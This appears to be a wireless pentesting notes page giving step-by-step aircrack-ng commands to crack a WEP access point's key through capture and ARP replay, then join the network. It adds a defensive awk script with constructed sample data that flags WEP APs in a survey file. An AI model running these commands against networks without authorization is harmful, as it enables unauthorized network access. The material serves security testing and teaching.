Attack WEP


Last updated 1 month ago

Ref:

  1. Start monitor mode:

# start monitor mode (creates the wlan0mon interface)
sudo airmon-ng start wlan0

# stop monitor mode when you want to connect to the WiFi again
sudo airmon-ng stop wlan0mon


# scan and show WPS information
sudo airodump-ng wlan0mon --wps
  2. Start capturing the WEP traffic of the target AP:

sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0mon

In parallel, run the ARP request replay attack (aireplay-ng -3):

# -b expects the AP's BSSID (MAC address), not the SSID name
sudo aireplay-ng -3 -b $AP_MAC -h $STATION_MAC wlan0mon
  3. Crack the WEP key from the capture:

# airodump-ng appends a sequence number to the -w prefix
sudo aircrack-ng capture_WEP-01.cap


After cracking, you can connect to the WiFi directly through the UI or from the terminal as below:

Make sure to stop monitor mode before connecting.

sudo iwconfig wlan0 essid "<target SSID Name>" key <hexKey>

# refresh the DHCP configuration
sudo dhclient wlan0
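
From the defender's side, the CSV file that airodump-ng writes next to the .cap when -w is used can be checked for access points that still advertise WEP, so they can be scheduled for migration. This is an added example, not part of the original notes; the function names and the sample rows are constructed for illustration.

```bash
#!/usr/bin/env bash
# Defensive audit: list access points that still advertise WEP in an
# airodump-ng CSV survey file. Usage: list_wep_aps capture_WEP-01.csv

# list_wep_aps FILE -> prints "BSSID<TAB>channel<TAB>ESSID" per WEP AP.
# Caveat: an ESSID containing a comma shifts the columns and is cut short.
list_wep_aps() {
  awk -F',' '
    function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
    # The AP table starts at the "BSSID" header and ends at the
    # "Station MAC" header that opens the client table.
    trim($1) == "BSSID"       { in_ap = 1; next }
    trim($1) == "Station MAC" { in_ap = 0 }
    in_ap && NF >= 14 {
      privacy = trim($6)                  # 6th column is "Privacy"
      if (privacy ~ /(^| )WEP( |$)/)
        printf "%s\t%s\t%s\n", trim($1), trim($4), trim($14)
    }
  ' "$1"
}

# Constructed sample in the airodump-ng CSV layout (not real capture data).
sample_csv() {
  cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:BB:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP, WEP, ,  -40, 120, 15, 0.  0.  0.  0, 10, lab-legacy, 
02:00:00:AA:BB:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -55, 98, 0, 0.  0.  0.  0, 8, lab-wpa2, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:DD:01, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -48, 30, 02:00:00:AA:BB:01, 
EOF
}
```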

Stuck?

https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture
https://www.youtube.com/watch?v=e667NA3aPqY
GitHub - ricardojoserf/wifi-pentesting-guide: WiFi Penetration Testing Guide